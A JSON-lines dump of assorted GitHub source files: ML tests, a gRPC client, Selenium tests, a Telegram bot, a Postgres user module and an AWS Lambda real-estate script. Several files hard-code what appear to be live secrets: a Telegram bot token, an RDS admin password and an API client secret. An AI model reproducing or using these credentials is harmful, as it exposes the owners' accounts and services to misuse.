{xgb.__version__}\"\n )\n def testFeatureWeightsParam(self):\n \"\"\"Test the feature_weights parameter for xgb version >= 1.3.0.\n Adapted from the official demo codes:\n http://xgboost.readthedocs.io/en/stable/python/examples/\n feature_weights.html\"\"\"\n\n rng = np.random.RandomState(1994)\n\n kRows = 1000\n kCols = 10\n\n X = rng.randn(kRows, kCols)\n y = rng.randn(kRows)\n fw = np.ones(shape=(kCols,))\n for i in range(kCols):\n fw[i] *= float(i)\n train_set = RayDMatrix(X, y, feature_weights=fw)\n\n evals_result = {}\n bst = train(\n {\n \"objective\": \"reg:squarederror\",\n \"eval_metric\": [\"rmse\", \"error\"],\n \"colsample_bynode\": 0.1,\n },\n train_set,\n num_boost_round=250,\n evals_result=evals_result,\n evals=[(train_set, \"train\")],\n verbose_eval=False,\n ray_params=RayParams(\n num_actors=2, cpus_per_actor=1 # Number of remote actors\n ),\n )\n\n feature_map = bst.get_fscore()\n # feature zero has 0 weight\n self.assertTrue(feature_map.get(\"f0\", None) is None)\n self.assertTrue(max(feature_map.values()) == feature_map.get(\"f9\"))\n\n\nif __name__ == \"__main__\":\n import sys\n\n import pytest\n\n sys.exit(pytest.main([\"-v\", __file__]))\n","repo_name":"ray-project/xgboost_ray","sub_path":"xgboost_ray/tests/test_end_to_end.py","file_name":"test_end_to_end.py","file_ext":"py","file_size_in_byte":16292,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"48"} +{"seq_id":"7943434056","text":"import json\nimport grpc\nimport consul\n\nfrom google.protobuf import empty_pb2\n\nfrom inventory_srv.proto import inventory_pb2, inventory_pb2_grpc\nfrom inventory_srv.config import settings\n\n\nclass InventroyTest:\n def __init__(self):\n # 连接grpc服务器\n c = consul.Consul(host=\"192.168.178.138\", port=8500)\n # 获取所有的services\n services = c.agent.services()\n ip = \"\"\n port = \"\"\n for key, value in services.items():\n if value[\"Service\"] == settings.SERVICE_NAME:\n ip = value[\"Address\"]\n port = value[\"Port\"]\n break\n if not ip:\n raise Exception()\n channel = grpc.insecure_channel(f\"{ip}:{port}\")\n self.inventory_stub = inventory_pb2_grpc.InventoryStub(channel)\n\n def set_inv(self):\n rsp = self.inventory_stub.SetInv(\n inventory_pb2.GoodsInvInfo(goodsId=10, num=110)\n )\n\n def get_inv(self):\n rsp = self.inventory_stub.InvDetail(\n inventory_pb2.GoodsInvInfo(goodsId=3)\n )\n print(rsp.num)\n\n def sell(self):\n goods_list = [(1, 10), (2, 20), (3, 30)]\n req = inventory_pb2.SellInfo()\n for goodsId, num in goods_list:\n req.goodsInfo.append(inventory_pb2.GoodsInvInfo(goodsId=goodsId, num=num))\n rsp = self.inventory_stub.Sell(req)\n\n def reback(self):\n goods_list = [(1, 6), (3, 3)]\n request = inventory_pb2.SellInfo()\n for goodsId, num in goods_list:\n request.goodsInfo.append(inventory_pb2.GoodsInvInfo(goodsId=goodsId, num=num))\n rsp = self.inventory_stub.Reback(request)\n\n\nif __name__ == \"__main__\":\n inventory = InventroyTest()\n # inventory.set_inv()\n # inventory.get_inv()\n inventory.sell()\n # inventory.reback()\n","repo_name":"chuyangc/MicroserviceFreshMall","sub_path":"shop_srv/inventory_srv/tests/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20623173995","text":"import requests, re\nimport hashlib\nfrom sys import exit\nfrom os.path import isfile\n\nimport argparse\nimport pandas as pd\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n '-e', '--excel-file',\n help='Nombre del Excel de cabys',\n default='cabys.xlsx',\n required=False,\n type=str,\n)\n\nparser.add_argument(\n '-t', '--xlsx-to-plain',\n help='Leer Excel de cabys y convertirlo a texto plano.',\n default='',\n required=False,\n type=str,\n)\n\nparser.add_argument(\n '-D', '--download-cabys',\n default=False,\n action='store_true',\n help='Descargar el Excel de cabys.',\n)\n\nargs = parser.parse_args()\n\nbase_url=\"https://www.bccr.fi.cr\"\ncabys_url=\"/indicadores-economicos/cat%C3%A1logo-de-bienes-y-servicios\"\n\ndef verify_html(line):\n if 'type=\"hidden\"' in line \\\n or re.search('javascript', line, re.IGNORECASE) \\\n or re.search('noscript', line, re.IGNORECASE) \\\n or 'type=\"text/css\"' in line:\n return False\n\n if len(line) < 8:\n return False\n\n ## The line is correct\n return True\n\n\ndef download_cabys(excel_file):\n session = requests.Session()\n response = session.get(base_url+cabys_url)\n\n #print(str(response.text).strip())\n clean_content = re.sub(\"[\\n\\r]\", '', response.text, flags=re.DOTALL)\n clean_content = re.sub(\"\\t\", ' ', clean_content, flags=re.DOTALL)\n clean_content = re.sub('id=\"[^\"]*\"', ' ', clean_content, flags=re.DOTALL)\n clean_content = re.sub('class=\"[^\"]*\"', ' ', clean_content, flags=re.DOTALL)\n clean_content = re.sub('style=\"[^\"]*\"', ' ', clean_content, flags=re.DOTALL)\n clean_content = re.sub(\" * \", ' ', clean_content, flags=re.DOTALL)\n\n ## Patter to remove script\n pattern = re.compile(r']*>.*?', re.DOTALL)\n clean_content = re.sub(pattern, '', clean_content)\n\n result = []\n for line in clean_content.split('= query:\n query_data.append(i)\n return query_data\n\n def delete(self, query):\n print(f'Работает метод __delete__ - удаляет {query}')\n \"\"\"\n Удаление записей из файла, которые соответствуют запрос,\n как в методе select. Если в query передан пустой словарь, то\n функция удаления не сработает\n \"\"\"\n if not len(query): return None\n\n with open(self.__data_file, encoding=\"utf=8\") as f:\n data = json.load(f)\n\n count = 0 # счетчик\n\n for i in data:\n if i.get(list(query.keys())[0]) == list(query.values())[0]:\n del data[count]\n count += 1\n\n with open(self.__data_file, \"w\", encoding=\"utf=8\") as f:\n json.dump(data, f)\n","repo_name":"AleksanderKarn/Parser_HH_SJ_vacancies","sub_path":"connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7967842964","text":"from Login import Login\nfrom selenium import webdriver\nimport time\nimport unittest\nclass Test_Login(unittest.TestCase):\n\n beforeScheduleElement=0\n \n @classmethod\n def setUpClass(cls):\n try:\n cls.driver = webdriver.Chrome(\"./chromedriver\")\n except:\n cls.driver = webdriver.Chrome(\"./chromedriver.exe\")\n cls.driver.implicitly_wait(10)\n cls.driver.maximize_window()\n\n def test_01_apply_job_then_add_in_pending_job(self):\n\n driver = self.driver\n #login#\n driver.get(\"http://localhost:3000/login\")\n time.sleep(2)\n driver.find_element_by_id('email').send_keys('teemotest1@gmail.com')\n driver.find_element_by_id('pass').send_keys('123456')\n driver.find_element_by_id('loginBtn').click()\n time.sleep(2)\n #create job#\n\n driver.get(\"http://localhost:3000/Createjob\")\n time.sleep(1)\n\n driver.find_element_by_id('jobname').send_keys('scheduletest') \n \n driver.find_element_by_id('amount').send_keys('5')\n\n driver.find_element_by_id('jobdescription').send_keys('scheduletest')\n\n driver.find_element_by_id('timebegin').send_keys('1800')\n\n driver.find_element_by_id('timeend').send_keys('1900')\n\n driver.find_element_by_id('location').send_keys('testbyselenium')\n\n driver.find_element_by_id('workDate').send_keys('21032020')\n\n driver.find_element_by_id('wages').send_keys('500')\n\n driver.find_elements_by_class_name('PrivateSwitchBase-input-358')[0].click() \n \n driver.find_elements_by_class_name(\"MuiButton-label\")[-1].click()\n\n time.sleep(1)\n driver.switch_to.alert.accept()\n time.sleep(1)\n driver.switch_to.alert.accept()\n time.sleep(2)\n\n #logout# \n driver.find_element_by_id('logout').click()\n\n #login# \n driver.get(\"http://localhost:3000/login\")\n time.sleep(2)\n driver.find_element_by_id('email').send_keys('teemotest2@gmail.com')\n driver.find_element_by_id('pass').send_keys('123456')\n driver.find_element_by_id('loginBtn').click()\n time.sleep(2)\n #apply new job compare before after job elements# \n\n driver.get(\"http://localhost:3000/Schedule\")\n time.sleep(2)\n\n print(len(driver.find_elements_by_class_name('MuiListItemText-root')),' elements')\n beforeElement = len(driver.find_elements_by_class_name('MuiListItemText-root'))\n time.sleep(2)\n\n print(len(driver.find_elements_by_class_name('rbc-event-content')),'schedule elements')\n self.beforeScheduleElement = len(driver.find_elements_by_class_name('rbc-event-content')),\n time.sleep(2)\n\n driver.get('http://localhost:3000/Dashboard')\n time.sleep(2)\n\n suggest_amount = len(driver.find_elements_by_class_name('MuiListSubheader-root.MuiListSubheader-sticky.MuiListSubheader-gutters'))\n new_index = -1 - suggest_amount\n while(True):\n driver.find_elements_by_class_name('MuiButton-label')[new_index].click()\n time.sleep(2) \n if('APPLY' == driver.find_elements_by_class_name('MuiButton-label')[-1].text):\n driver.find_elements_by_class_name('MuiButton-label')[-1].click()\n time.sleep(2)\n elif('ALREADY APPLY' == driver.find_elements_by_class_name('MuiButton-label')[-1].text): break\n driver.get('http://localhost:3000/Dashboard')\n time.sleep(2)\n\n # driver.find_elements_by_class_name('MuiButton-label')[new_index].click()\n # time.sleep(2) \n # driver.find_elements_by_class_name('MuiButton-label')[-1].click()\n # time.sleep(2) \n\n driver.get(\"http://localhost:3000/Schedule\")\n time.sleep(2)\n\n print(len(driver.find_elements_by_class_name('MuiListItemText-root')),' elements')\n afterElement = len(driver.find_elements_by_class_name('MuiListItemText-root'))\n print(beforeElement,' ',type(beforeElement) )\n beforeElement=int(beforeElement)+1\n afterElement=int(afterElement)\n print('before=',beforeElement,'after=',afterElement)\n assert beforeElement == afterElement\n time.sleep(2)\n #logout# \n driver.find_element_by_id('logout').click()\n\n print('Finish1')\n\n def test_02_accept_job_then_add_in_schedule(self):\n #login and accept# \n\n driver = self.driver\n driver.get(\"http://localhost:3000/login\")\n time.sleep(2)\n\n driver.find_element_by_id('email').send_keys('teemotest1@gmail.com')\n\n driver.find_element_by_id('pass').send_keys('123456')\n\n driver.find_element_by_id('loginBtn').click()\n time.sleep(2)\n \n driver = self.driver\n\n driver.get(\"http://localhost:3000/JobOwned\")\n time.sleep(2)\n\n driver.find_elements_by_class_name('MuiButton-label')[10].click()\n time.sleep(2)\n\n driver.find_elements_by_class_name('MuiListItemText-root')[10].click()\n time.sleep(1)\n\n # driver.find_elements_by_class_name('MuiButton-label')[10].click()\n # time.sleep(2)\n\n\n driver.get(\"http://localhost:3000/JobOwned\")\n time.sleep(2)\n\n driver.find_elements_by_class_name('MuiButton-label')[10].click()\n time.sleep(2)\n\n driver.find_elements_by_class_name('MuiListItemText-root')[9].click()\n time.sleep(2)\n\n driver.find_element_by_id('customized-menu').click()\n driver.find_element_by_class_name('acceptBtn').click()\n time.sleep(2)\n\n driver.find_elements_by_class_name('MuiButton-label')[10].click()\n time.sleep(2)\n\n driver.find_elements_by_class_name('MuiListItemText-root')[10].click()\n time.sleep(1)\n driver.get(\"http://localhost:3000/Dashboard\")\n time.sleep(1)\n #logout# \n driver.find_element_by_id('logout').click()\n\n #login# \n driver.get(\"http://localhost:3000/login\")\n time.sleep(2)\n driver.find_element_by_id('email').send_keys('teemotest2@gmail.com')\n driver.find_element_by_id('pass').send_keys('123456')\n driver.find_element_by_id('loginBtn').click()\n time.sleep(2)\n #count accept job in schedule# \n\n driver.get(\"http://localhost:3000/Schedule\")\n time.sleep(2)\n\n print(len(driver.find_elements_by_class_name('rbc-event-content')),'schedule elements')\n afterScheduleElement = len(driver.find_elements_by_class_name('rbc-event-content'))\n time.sleep(2)\n self.beforeScheduleElement=int(self.beforeScheduleElement)+1\n afterScheduleElement=int(afterScheduleElement)\n print('beforeScheduleElement=',self.beforeScheduleElement,'afterScheduleElement=',afterScheduleElement)\n assert self.beforeScheduleElement == afterScheduleElement\n time.sleep(2)\n #logout# \n driver.find_element_by_id('logout').click()\n\n #Delete new job# \n driver = self.driver\n driver.get(\"http://localhost:3000/login\")\n time.sleep(2)\n\n driver.find_element_by_id('email').send_keys('teemotest1@gmail.com')\n\n driver.find_element_by_id('pass').send_keys('123456')\n\n driver.find_element_by_id('loginBtn').click()\n time.sleep(2)\n\n driver.get(\"http://localhost:3000/JobOwned\")\n time.sleep(2)\n\n driver.find_elements_by_class_name('MuiButton-label')[10].click()\n time.sleep(2)\n\n print(len(driver.find_elements_by_class_name('MuiListItemText-root')))\n driver.find_elements_by_class_name('MuiListItemText-root')[7].click()\n time.sleep(5) \n\n print('Finish2')\n\n\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.close()\n cls.driver.quit()\n print(\"complete\")\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"2110423-2019-2/sec33_Leelulila","sub_path":"end2end_testing/Test_Schedule.py","file_name":"Test_Schedule.py","file_ext":"py","file_size_in_byte":8528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21023647823","text":"from datetime import date\n\nfrom sqlalchemy import and_, func, select\n\nfrom app.bookings.models import Bookings\nfrom app.dao.base import BaseDAO\nfrom app.database import async_session_maker\nfrom app.hotels.models import Hotels\nfrom app.hotels.rooms.models import Rooms\n\n\nclass HotelDAO(BaseDAO):\n model = Hotels\n\n @classmethod\n async def get_all(cls, location: str, date_from: date, date_to: date):\n async with async_session_maker() as session:\n booked_hotels = (\n select(func.count(Bookings.id).label(\"booked\"), Rooms.hotel_id)\n .join(Rooms, Rooms.id == Bookings.room_id, isouter=True)\n .where(\n and_(\n Bookings.date_from <= date_to,\n Bookings.date_to >= date_from,\n )\n )\n .group_by(Rooms.hotel_id)\n .cte(\"booked_hotels\")\n )\n\n get_hotels = (\n select(\n Hotels.id,\n Hotels.name,\n Hotels.location,\n Hotels.services,\n Hotels.rooms_quantity,\n Hotels.image_id,\n (\n Hotels.rooms_quantity - func.coalesce(booked_hotels.c.booked, 0)\n ).label(\"rooms_left\"),\n )\n .select_from(Hotels)\n .join(\n booked_hotels, booked_hotels.c.hotel_id == Hotels.id, isouter=True\n )\n .where(\n and_(\n Hotels.rooms_quantity - func.coalesce(booked_hotels.c.booked, 0)\n > 0,\n Hotels.location.like(f\"%{location}%\"),\n )\n )\n )\n hotels = await session.execute(get_hotels)\n return hotels.mappings().all()\n","repo_name":"ejina21/pet_project","sub_path":"app/hotels/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5555902949","text":"import nltk\nimport lightrdf\n\nTEXT_FILE = 'computer-science.txt'\nCREATED_FILE = 'created-file.txt'\nONTOLOGY_FILE = 'ontology.owl'\nONTOLOGY_CHECK_FILE = 'ontology-check-file.txt'\n\n\ndef check_for_ontology(phrase):\n words_list = nltk.word_tokenize(phrase)\n if check_if_is_compatible(phrase):\n with open(ONTOLOGY_FILE, \"rb\") as file_in:\n doc = lightrdf.RDFDocument(file_in, parser=lightrdf.xml.PatternParser, base_iri=None)\n\n for word in words_list:\n for triple in doc.search_triples(None, None, None):\n if triple[2].endswith(\"/\" + word):\n return True\n elif triple[2].endswith(\"#\" + word):\n return True\n\n return False\n\n\ndef check_if_is_compatible(phrase):\n words_list = nltk.word_tokenize(phrase)\n pos_map = nltk.pos_tag(words_list)\n i = 0\n j = 0\n k = 0\n ok1 = False\n ok2 = False\n ok3 = False\n for pos in pos_map:\n if (\"NN\" in pos[1]) and ok1 == False:\n ok1 = True\n i += 1\n break\n else:\n i += 1\n\n for j in range(i, len(pos_map)):\n if (\"VB\" in pos_map[j][1]) and ok2 == False and ok1 == True:\n ok2 = True\n j += 1\n break\n else:\n j += 1\n\n for K in range(j, len(pos_map)):\n if (\"NN\" in pos_map[k][1]) and ok3 == False and ok2 == True and ok1 == True:\n ok3 = True\n k += 1\n break\n else:\n k += 1\n\n return ok1 and ok2 and ok3\n\n\nif __name__ == '__main__':\n # with open(TEXT_FILE, \"r\", encoding=\"mbcs\") as in_file:\n # text = in_file.read()\n # sentences = nltk.sent_tokenize(text)\n #\n # created_file = open(CREATED_FILE, \"w\", encoding=\"mbcs\")\n # for sentence in sentences:\n # if check_if_is_compatible(sentence):\n # created_file.write(sentence)\n # created_file.write('\\n')\n\n with open(CREATED_FILE, \"r\", encoding=\"mbcs\") as in_file:\n text = in_file.read()\n sentences = nltk.sent_tokenize(text)\n\n ontology_check_file = open(ONTOLOGY_CHECK_FILE, \"w\", encoding=\"mbcs\")\n for sentence in sentences:\n if check_for_ontology(sentence):\n ontology_check_file.write(sentence)\n ontology_check_file.write('\\n')\n","repo_name":"NarcisSt/IA-Laboratories","sub_path":"lab8/lab8cd.py","file_name":"lab8cd.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34078107391","text":"import os\nimport uuid\nimport sys\nimport argparse\nimport pandas as pd\nfrom psims.mzml.writer import MzMLWriter\nimport pymzml\n\ndef convert_agilent(input_filename, output_filename, msconvert_bin):\n scan_current = 1\n previous_ms1_scan = 0\n\n temp_mzML = os.path.join(os.path.dirname(output_filename), \"{}.mzML\".format(str(uuid.uuid4())))\n\n with MzMLWriter(open(temp_mzML, 'wb'), close=True) as out:\n # Add default controlled vocabularies\n out.controlled_vocabularies()\n # Open the run and spectrum list sections\n with out.run(id=\"my_analysis\"):\n with out.spectrum_list(count=1):\n #spectrum_count = len(scans) + sum([len(products) for _, products in scans])\n run = pymzml.run.Reader(input_filename)\n for spectrum in run:\n if spectrum['ms level'] == 1:\n out.write_spectrum(\n spectrum.mz, spectrum.i,\n id=\"scan={}\".format(scan_current), params=[\n \"MS1 Spectrum\",\n {\"ms level\": 1},\n {\"total ion current\": sum(spectrum.i)}\n ],\n scan_start_time=spectrum.scan_time_in_minutes())\n previous_ms1_scan = scan_current\n scan_current += 1\n elif spectrum[\"ms level\"] == 2:\n precursor_spectrum = spectrum.selected_precursors[0]\n precursor_mz = precursor_spectrum[\"mz\"]\n precursor_intensity = 0\n precursor_charge = 0\n\n try:\n precursor_charge = precursor_spectrum[\"charge\"]\n precursor_intensity = precursor_spectrum[\"i\"]\n except:\n pass\n\n out.write_spectrum(\n spectrum.mz, spectrum.i,\n id=\"scan={}\".format(scan_current), params=[\n \"MS1 Spectrum\",\n {\"ms level\": 2},\n {\"total ion current\": sum(spectrum.i)}\n ],\n # Include precursor information\n precursor_information={\n \"mz\": precursor_mz,\n \"intensity\": precursor_intensity,\n \"charge\": precursor_charge,\n \"scan_id\": \"scan={}\".format(previous_ms1_scan),\n \"activation\": [\"beam-type collisional dissociation\", {\"collision energy\": spectrum[\"collision energy\"]}]\n },\n scan_start_time=spectrum.scan_time_in_minutes())\n\n scan_current += 1\n\n # Reconvert with msconvert\n cmd = '{} {} --32 --zlib --ignoreUnknownInstrumentError \\\n --outdir {} --outfile {}'.format(msconvert_bin, temp_mzML, os.path.dirname(output_filename), os.path.basename(output_filename))\n print(cmd)\n os.system(cmd)\n\n # remove temp file\n os.remove(temp_mzML)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Test write out a file.')\n parser.add_argument('input_filename')\n parser.add_argument('output_filename')\n parser.add_argument('--msconvert_bin', default='msconvert')\n\n args = parser.parse_args()\n\n convert_agilent(args.input_filename, args.output_filename, args.msconvert_bin)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Wang-Bioinformatics-Lab/Agilent_Conversion_Workflow","sub_path":"bin/convert_agilent.py","file_name":"convert_agilent.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16299978150","text":"import config\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom skimage.io import imread\nfrom skimage.morphology import binary_opening, disk, label\n\n\ndef rle_decode(mask_rle, shape=(768, 768)):\n '''\n mask_rle: run-length as string formated (start length)\n shape: (height,width) of array to return \n Returns numpy array, 1 - mask, 0 - background\n '''\n s = mask_rle.split()\n starts, lengths = [np.asarray(x, dtype=int) for x in (s[0:][::2], s[1:][::2])]\n starts -= 1\n ends = starts + lengths\n img = np.zeros(shape[0]*shape[1], dtype=np.uint8)\n for lo, hi in zip(starts, ends):\n img[lo:hi] = 1\n return img.reshape(shape).T # Needed to align to RLE direction\n\ndef masks_as_image(in_mask_list):\n # Take the individual ship masks and create a single mask array for all ships\n all_masks = np.zeros((768, 768), dtype = np.uint8)\n for mask in in_mask_list:\n if isinstance(mask, str):\n all_masks |= rle_decode(mask)\n return all_masks\n","repo_name":"Andrii-Radyhin/Airbus-Ship-Detection-Challenge","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"45332825436","text":"\nimport connection\n\n\n\ndef getConn():\n c = connection.conn()\n return c\n\ndef closeConnection(connection,cursor):\n if connection:\n cursor.close()\n connection.close()\n\n\n'''Insert a telegram user if it doesnt exist\n Return True if user has been inserted successfully, False otherwise\n'''\ndef insertUser(tid, name, surname, status='P', admin=False ):\n if getUserByTid(tid):\n return False\n \n connection = getConn()\n cursor = connection.cursor()\n \n\n postgres_insert_query = \"\"\" INSERT INTO users (tid, username, surname, status, user_admin) VALUES (%s,%s,%s,%s,%s)\"\"\"\n record_to_insert = (tid, name, surname, status, admin)\n cursor.execute(postgres_insert_query, record_to_insert)\n\n connection.commit()\n count = cursor.rowcount\n\n closeConnection(connection,cursor)\n\n if count <1:\n return False\n print(count, \"Record inserted successfully into users table\")\n return True\n\n\n# Returns all the user registered on bot\ndef getUsers():\n connection = getConn()\n cursor = connection.cursor()\n\n postgreSQL_select_Query = \"select users.tid from users\"\n \n cursor.execute(postgreSQL_select_Query)\n publisher_records = cursor.fetchall()\n closeConnection(connection,cursor)\n return publisher_records\n\n''' Gets the user by telegram id '''\ndef getUserByTid(tid):\n connection = getConn()\n cursor = connection.cursor()\n\n postgreSQL_select_Query = \"select * from users where tid=\" + str(tid)\n \n cursor.execute(postgreSQL_select_Query)\n publisher_records = cursor.fetchall()\n\n closeConnection(connection,cursor)\n return publisher_records\n # if not publisher_records:\n # return False\n # else:\n # return True \n \n\ndef approveUser(tid):\n\n alreadyApproved = getUserByTid(tid)\n connection = getConn()\n cursor = connection.cursor()\n\n postgreSQL_update_Query = \"UPDATE users SET status = 'A' WHERE tid = %s\"\n \n cursor.execute(postgreSQL_update_Query, (tid,))\n connection.commit()\n count = cursor.rowcount\n print(count, \"Record updated successfully \")\n closeConnection(connection,cursor)\n return count > 0, alreadyApproved\n\n\n# insertUser(22222, 'boh','bah')\n#getUsers()\n# if getUserByTid(145645559):\n# print(getUserByTid(145645559)[0][3])\n\n","repo_name":"TomasMali/Ticket","sub_path":"conn/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19818568097","text":"import recieving_server\nimport sending_server\nimport threading\nimport requests\nfrom time import sleep\n\n\ndef receiving_thread():\n receiving_server_thread = threading.Thread(target=recieving_server.main)\n receiving_server_thread.start()\n\n\ndef sending_thread():\n sending_server_thread = threading.Thread(target=sending_server.main)\n sending_server_thread.start()\n# recieving_server.GLOBAL_QUEUE > sending_server.LIST_MASSAGES\n\n\n# def queue_to_list_check():\n# while True:\n# queue_new_msg = recieving_server.GLOBAL_QUEUE.get()\n# recieving_server.msg_file_save(queue_new_msg)\n# sending_server.LIST_MASSAGES.append(queue_new_msg)\n\ndef telegram_client_msg_receiving():\n last_message_id = 0\n token = \"1698512750:AAHYWLH6sdTi6kIVJbTBpqjrBneZgt9rS8w\"\n url = f'https://api.telegram.org/bot{token}/getUpdates'\n\n while True:\n response = requests.post(url)\n for message in response.json()[\"result\"]:\n if last_message_id != 0 and last_message_id >= message['message']['message_id']:\n continue\n\n sending_server.LIST_MASSAGES.append(message[\"message\"][\"text\"])\n\n last_message_id = message['message']['message_id']\n\n sleep(5)\n\n\n\ndef queue_thread():\n queue_thread_start = threading.Thread(target=telegram_client_msg_receiving)\n queue_thread_start.start()\n\n\ndef main():\n queue_thread()\n receiving_thread()\n sending_thread()\n input(\"Press any key to stop the server \")\n\n\nif __name__ == '__main__':\n main()","repo_name":"xErikx/1st-project","sub_path":"main_server.py","file_name":"main_server.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30466155766","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('transript_interact/',views.process_transcript,name ='transcript_interact'),\n path('transcript/',views.get_data_from_post, name='transcript'),\n path('wiki-interaction/',views.Process_Wiki_Request,name = 'wiki-interaction'),\n path('gpt-interaction/',views.Process_GPT_Request,name = 'gpt-interaction'),\n]\n","repo_name":"gonglk/transcribing_deepgram","sub_path":"transcript/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"923540113","text":"import requests as req\nimport sys\nimport logging\nimport pymysql\nimport datetime\nimport statistics\nimport heapq\nfrom random import randint\n\ndef lambda_handler(event, context):\n rds_host = \"sevenlendingdb.cvnlc8wxkgyn.us-east-2.rds.amazonaws.com\"\n name = \"admin\"\n password = \"123qweQWE\"\n db_name = \"N7Lending\"\n\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n try:\n conn = pymysql.connect(host=rds_host, user=name, passwd=password, db=db_name, connect_timeout=5)\n except pymysql.MySQLError as e:\n logger.error(\"ERROR: Unexpected error: Could not connect to MySQL instance.\")\n logger.error(e)\n sys.exit()\n\n logger.info(\"SUCCESS: Connection to RDS MySQL instance succeeded\")\n\n # Logic Code Starts Here\n\n client_id = '16p7n5khh0hvmb2146mj8iggoc'\n client_secret = 'cv9djs2b2s85bp2t4f2ummcn5nhm0l2dmrjq0ilvsm3jod2sf6s'\n\n token_url = 'https://authenticate.constellation1apis.com/oauth2/token'\n\n d = {\"client_id\": client_id, \"client_secret\": client_secret, \"grant_type\": \"client_credentials\"}\n\n r = req.post(token_url, data=d).json()\n\n access_token = r['access_token']\n header = 'Bearer ' + access_token\n hz = {'Authorization': header}\n \n one_YearAgo_Today = datetime.datetime.now() - datetime.timedelta(days=365)\n z_ = str(one_YearAgo_Today.strftime('%Y-%m-%d')) + \"T\" + \"00:00:00\" + \"Z\"\n\n top_=str(1)\n url2_ = 'https://listings.constellation1apis.com/OData/Property?$top=' + top_ + '&$ignorenulls=true&$filter=OnMarketTimestamp%20ge%20' + z_ + '%20and%20OriginatingSystemName%20eq%20%27REColorado%27%20and%20StandardStatus%20eq%20%27Closed%27&$select=OffMarketTimestamp'\n url2_pikes_ = 'https://listings.constellation1apis.com/OData/Property?$top=' + top_ + '&$ignorenulls=true&$filter=OnMarketTimestamp%20ge%20' + z_ +'%20and%20OriginatingSystemName%20eq%20%27PikesPeak%27%20and%20StandardStatus%20eq%20%27Closed%27&$select=OffMarketTimestamp'\n\n\n url_ = 'https://listings.constellation1apis.com/OData/Property?$top=' + top_ + '&$ignorenulls=true&$filter=OnMarketTimestamp%20ge%20' + z_ + '%20and%20OriginatingSystemName%20eq%20%27REColorado%27%20and%20StandardStatus%20eq%20%27Active%27&$select=PostalCode'\n url_pikes_ = 'https://listings.constellation1apis.com/OData/Property?$top=' + top_ + '&$ignorenulls=true&$filter=OnMarketTimestamp%20ge%20' + z_ + '%20and%20OriginatingSystemName%20eq%20%27PikesPeak%27%20and%20StandardStatus%20eq%20%27Active%27&$select=PostalCode'\n\n response2_ = req.get(url2_, headers=hz, timeout=60, stream=True).json() # Get Closed Properties\n response2_pikes_ = req.get(url2_pikes_, headers=hz, timeout=60, stream=True).json() # Get Closed Properties\n \n response_ = req.get(url_, headers=hz, timeout=60, stream=True).json() # Get Active Properties\n response_pikes_ = req.get(url_pikes_, headers=hz, timeout=60, stream=True).json() # Get Active Properties\n \n total_units_sold_ = int(response2_['@odata.totalCount']) + int(response2_pikes_['@odata.totalCount'])\n total_units_open_ = int(response_['@odata.totalCount']) + int(response_pikes_['@odata.totalCount'])\n \n t1 = str(one_YearAgo_Today.strftime('%Y-%m-%d'))\n t = datetime.datetime.now()\n t2 = str(t.strftime('%Y-%m-%d'))\n time_period = \"From \" + str(t1) + ' To ' + str(t2)\n \n with conn.cursor() as cur:\n cur.execute(\"DELETE FROM raw_data_open_properties\")\n cur.execute(\"DELETE FROM raw_data_closed_properties\")\n conn.commit()\n \n prices = [0]\n dictionary = {}\n postal_codes = {}\n \n \n for d in range(366):\n oneYearAgoToday = datetime.datetime.now() - datetime.timedelta(days=d)\n one_day_later = datetime.datetime.now() - datetime.timedelta(days=(d - 1))\n t = datetime.datetime.now()\n today = str(t.strftime('%Y-%m-%d')) + \"T\" + \"00:00:00\" + \"Z\"\n\n z = str(oneYearAgoToday.strftime('%Y-%m-%d')) + \"T\" + \"00:00:00\" + \"Z\"\n zg = str(one_day_later.strftime('%Y-%m-%d')) + \"T\" + \"00:00:00\" + \"Z\"\n\n top = str(500000)\n\n query = 'OnMarketTimestamp,ListPrice,PostalCode,OriginatingSystemName,ListAgentEmail,ListAgentFullName,ListAgentPreferredPhone,StandardStatus,ListingId'\n \n url = 'https://listings.constellation1apis.com/OData/Property?$top=' + top + '&$ignorenulls=true&$filter=OnMarketTimestamp%20gt%20' + z + '%20and%20OnMarketTimestamp%20le%20' + zg + '%20and%20OriginatingSystemName%20eq%20%27REColorado%27%20and%20StandardStatus%20eq%20%27Active%27&$select=' + query\n\n url2 = 'https://listings.constellation1apis.com/OData/Property?$top=' + top + '&$ignorenulls=true&$filter=OnMarketTimestamp%20gt%20' + z + '%20and%20OnMarketTimestamp%20le%20' + zg + 